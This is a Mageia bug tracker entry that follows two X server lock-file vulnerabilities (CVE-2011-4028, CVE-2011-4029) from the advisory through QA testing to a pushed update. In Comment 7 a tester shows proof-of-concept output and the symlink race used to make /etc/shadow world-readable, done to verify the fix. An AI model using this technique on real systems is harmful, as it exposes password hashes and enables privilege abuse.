Bug 3102

Summary: CVE-2011-4028, CVE-2011-4029: xserver locking code issues
Product: Mageia Reporter: Nicolas Vigier <boklm>
Component: SecurityAssignee: QA Team <qa-bugs>
Status: RESOLVED FIXED QA Contact:
Severity: normal    
Priority: Normal CC: davidwhodgins, dmorganec, sysadmin-bugs, tmb
Version: 1Keywords: validated_update
Target Milestone: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Source RPM: x11-server CVE:
Status comment:
Attachments: POC for CVE-2011-4029

Description Nicolas Vigier 2011-10-18 21:21:15 CEST 
From this mail :
http://lists.freedesktop.org/archives/xorg-announce/2011-October/001744.html

Two vulnerabilities have been discovered in the code handling the X
server lock, that forbids two X servers from serving the same display
simultaneously.

o CVE-2011-4028 : File disclosure vulnerability:
  It is possible to deduce if a file exists or not by exploiting the
  way that Xorg creates its lock files.

  This is caused by the fact that the X server is behaving differently
  if the lock file already exists as a symbolic link pointing to an
  existing or non-existing file.

o CVE-2011-4029 : File permission change vulnerability:
  It is possible for a non-root user to set the permissions for
  all users on any file or directory to 444, giving unwanted read
  access or causing denies of service (by removing execute permission).
  This is caused by a race between creating the lock file and setting
  its access modes.


Fix
- ---

Those issues have been fixed by the following two git commits:

CVE-2011-4028: 6ba44b91e37622ef8c146d8f2ac92d708a18ed34
http://cgit.freedesktop.org/xorg/xserver/commit/?id=6ba44b91e37622ef8c146d8f2ac92d708a18ed34

CVE-2011-4029: b67581cf825940fdf52bf2e0af4330e695d724a4
http://cgit.freedesktop.org/xorg/xserver/commit/?id=b67581cf825940fdf52bf2e0af4330e695d724a4
Comment 1 Manuel Hiebel 2011-11-11 01:36:50 CET 
Ping ?
Comment 2 Thierry Vignaud 2011-11-22 13:24:25 CET 
I've no time for this

Assignee: thierry.vignaud => security

Comment 3 Manuel Hiebel 2011-12-06 02:02:48 CET 
Ping ?
Comment 4 D Morgan 2012-01-01 23:32:59 CET 
i look this one

CC: (none) => dmorganec

Comment 5 D Morgan 2012-01-01 23:51:58 CET 
pushed in updates_testing fixing the 2 CVE

Assignee: security_officers => qa-bugs

Comment 6 claire robinson 2012-01-03 14:26:23 CET 
Created attachment 1325 [details]
POC for CVE-2011-4029

There are instructions in the file, not tried it yet though.
Comment 7 claire robinson 2012-01-03 14:40:05 CET 
POC does work as intended and shows we are vulnerable

Testing x86_64


Before
------
$ ll /etc/shadow
-r--r----- 1 root shadow 1174 Jan  3 11:14 /etc/shadow

$ ./xchmod /etc/shadow
[+] Trying to stop a Xorg process right before chmod()
[+] Process ID 3877 stopped (SIGSTOP sent)
[+] Removing /tmp/.tX1-lock by launching another Xorg process
[+] Creating evil symlink (/tmp/.tX1-lock -> /etc/shadow)
[+] Process ID 3877 resumed (SIGCONT sent)
[+] Attack succeeded, ls -l /etc/shadow:
-r--r--r-- 1 root shadow 1174 Jan  3 11:14 /etc/shadow

$ ll /etc/shadow
-r--r--r-- 1 root shadow 1174 Jan  3 11:14 /etc/shadow

Undoing it..

$ su -c "chmod 440 /etc/shadow" -
Password:
$ ll /etc/shadow
-r--r----- 1 root shadow 1174 Jan  3 11:14 /etc/shadow


After
-----

The following 3 packages are going to be installed:

- x11-server-common-1.10.1-1.1.mga1.x86_64
- x11-server-devel-1.10.1-1.1.mga1.x86_64
- x11-server-xorg-1.10.1-1.1.mga1.x86_64

$ ll /etc/shadow
-r--r----- 1 root shadow 1174 Jan  3 11:14 /etc/shadow
$ ./xchmod /etc/shadow
[+] Trying to stop a Xorg process right before chmod()
[+] Process ID 5223 stopped (SIGSTOP sent)
[+] Removing /tmp/.tX1-lock by launching another Xorg process
[+] Creating evil symlink (/tmp/.tX1-lock -> /etc/shadow)
[+] Process ID 5223 resumed (SIGCONT sent)
[-] Attack failed, rights are 100440.  Try again!

$ ll /etc/shadow
-r--r----- 1 root shadow 1174 Jan  3 11:14 /etc/shadow
Comment 8 Dave Hodgins 2012-01-03 23:58:41 CET 
Testing complete on i586.

Could someone from the sysadmin team push the srpm
x11-server-1.10.1-1.1.mga1.src.rpm
from Core Updates Testing to Core Updates.

Advisory:  This security update for x11-server corrects the following two
vulnerabilities have been discovered in the code handling the X
server lock, that forbids two X servers from serving the same display
simultaneously.

o CVE-2011-4028 : File disclosure vulnerability:
  It is possible to deduce if a file exists or not by exploiting the
  way that Xorg creates its lock files.

  This is caused by the fact that the X server is behaving differently
  if the lock file already exists as a symbolic link pointing to an
  existing or non-existing file.

o CVE-2011-4029 : File permission change vulnerability:
  It is possible for a non-root user to set the permissions for
  all users on any file or directory to 444, giving unwanted read
  access or causing denies of service (by removing execute permission).
  This is caused by a race between creating the lock file and setting
  its access modes.

https://bugs.mageia.org/show_bug.cgi?id=3102

Keywords: (none) => validated_update
CC: (none) => davidwhodgins, sysadmin-bugs

Comment 9 Thomas Backlund 2012-01-04 13:33:04 CET 
Update pushed.

Status: NEW => RESOLVED
CC: (none) => tmb
Resolution: (none) => FIXED